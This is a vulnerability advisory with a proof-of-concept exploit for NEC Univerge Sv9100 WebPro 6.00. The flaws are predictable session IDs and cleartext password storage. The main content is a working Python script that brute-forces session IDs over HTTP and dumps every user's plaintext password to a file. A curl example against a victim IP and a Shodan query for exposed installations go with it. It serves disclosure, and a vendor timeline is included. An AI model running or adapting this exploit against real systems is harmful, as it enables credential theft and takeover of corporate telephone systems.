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NEC Univerge Sv9100 WebPro - 6.00 - Predictable Session ID / Clear Text Password Storage

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NEC Univerge Sv9100 WebPro 6.00 suffers from Predictable Session ID & Cleartext Password Storage, allowing attacker to access clear text passwords via HTTP request

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NEC Univerge Sv9100 WebPro - 6.00 - Predictable Session ID / Clear Text Password Storage
4 Dec 201800:00
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CVE-2018-11741
27 Dec 201800:29
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CVE-2018-11742
27 Dec 201800:29
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CVE-2018-11741
26 Dec 201820:00
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CVE
CVE-2018-11742
26 Dec 201820:00
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CVE-2018-11741
26 Dec 201820:00
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CVE-2018-11742
26 Dec 201820:00
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NEC Univerge Sv9100 WebPro - 6.00 - Predictable Session ID Clear Text Password Storage
4 Dec 201800:00
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CVE-2018-11741
26 Dec 201821:29
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NVD
CVE-2018-11742
26 Dec 201821:29
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[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/NEC-UNIVERGE-WEBPRO-v6.00-PREDICTABLE-SESSIONID-CLEARTEXT-PASSWORDS.txt
[+] ISR: ApparitionSec   


***Greetz: indoushka | Eduardo B. 0day***


[Vendor]
www.necam.com


[Affected Product Code Base]
NEC Univerge Sv9100 WebPro - 6.00.00


NEC Univerge WebPro, is a web-based programming tool for the NEC Switch, which is used to program corporate Telephone systems.


Public facing installations as of Dec 1, 2018
https://www.shodan.io/search?query=Server+Henry
Result: 7,797 


[Vulnerability Type(s)]
[CVE Reference(s)]
Predictable Session ID - CVE-2018-11741 / Cleartext Password Storage - CVE-2018-11742


[Attack Vectors]
Make repeated remote HTTP requests until arriving at a valid authenticated sessionId.


Security Issue:
================
NEC Univerge WebPro suffers from a "Predictable Session ID" that can potentially disclose all user account information including passwords stored in clear text in the Web UI.
Attackers can simply increment numbers until arriving at a live session, then by using a specific URI dump the entire account information for all users including the clear text passwords.

e.g..

curl  http://NEC-VICTIM-IP/Home.htm?sessionId=12959&GOTO(8)


Exploit/POC:
=============
'''

from socket import *
import re

#Univerge Sv9100 NEC WebPro : 6.00
#Dumps user accounts and plaintext passwords stored in Web UI in Administrator Programming Password Setup' webpage
#http://TARGET-IP/Home.htm?sessionId=12959&GOTO(8) "GOTO(8)" will retrieve all account usernames and cleartext passwords.

print "NEC Univerge Sv9100 WebPro - 6.00.00 / Remote 0day Exploit POC"
print "hyp3rlinx"


IP=raw_input("[+] TARGET> ")
res=''
findme="Programming Password Setup"
cnt=0
tmp=False
tmp2=False
pwned=False

#check application is NEC and vuln version
def is_NEC_webpro(u):
    global tmp,tmp2,cnt
    res=''
    cnt+=1
    s=socket(AF_INET, SOCK_STREAM)
    s.connect((IP,80))
    s.send('GET '+u+' HTTP/1.1\r\nHost: '+IP+'\r\n\r\n')

    while True:
        res=s.recv(4048)
        if res.find('</html>')!=-1:
            break   
    s.close()
    
    if re.findall(r"\bWebPro\b", res):
        tmp=True
        if tmp and cnt < 3:
            is_NEC_webpro('/Login.htm')
            if re.findall(r"\b6.00.00\b", res) and re.findall(r"\bNEC Corporation of America\b", res):
                tmp2 = True
            if tmp == True and tmp2 == True:
                return True
    return False



def dump(acct):
    file=open('NEC-Accounts.txt', 'w')
    file.write(acct+'\n')
    file.close()


def breach(sid):
    global pwned
    try:
        s=socket(AF_INET, SOCK_STREAM)
        s.connect((IP,80))
        sid=str(sid)
        print 'trying sessid '+sid
        s.send('GET /Home.htm?sessionId%3d'+sid+'&GOTO(8)%20HTTP/1.1\r\nHost: '+IP+'\r\n\r\n')
    except Exception as e:
        print str(e)
        
    while True:
        res = s.recv(4096)
        if res.find('</html>')!=-1:
            break
        if re.findall(r"\bProgramming Password Setup\b",res)!=-1: ## We hit an active session.
            dump(res)
            print res
            pwned=True
       
    s.close()
    return pwned


def sessgen():
    for sessid in range(1000,15000): ##test 14109
        if breach(sessid):
            break


if __name__=='__main__':
    if is_NEC_webpro('/'):
        sessgen()
    else:
        print 'Not NEC or version not vuln.'

'''
Network Access:
===============
Remote


Severity:
=========
High


Disclosure Timeline:
=============================
Vendor Notification:  May 15, 2018
No reply
Vendor Notification: May 18, 2018
No reply
Vendor Notification:  June 4, 2018
No reply
Mitre assign CVE: June 5, 2018
JPCERT replies: June 6, 2018
JPCERT shares information with NEC : June 7, 2018
Request status : August 11, 2018
JPCERT contact NEC : August 14, 2018
No reply from vendor
Request status : August 21, 2018
JPCERT again contacts NEC : August 21, 2018
JPCERT "vendor working on a release" : August 23 2018
JPCERT "Vendor release October 2018" : September 12, 2018
NEC "Requests public disclosure after December 1st." : November 19, 2018
December 2, 2018 : Public Disclosure


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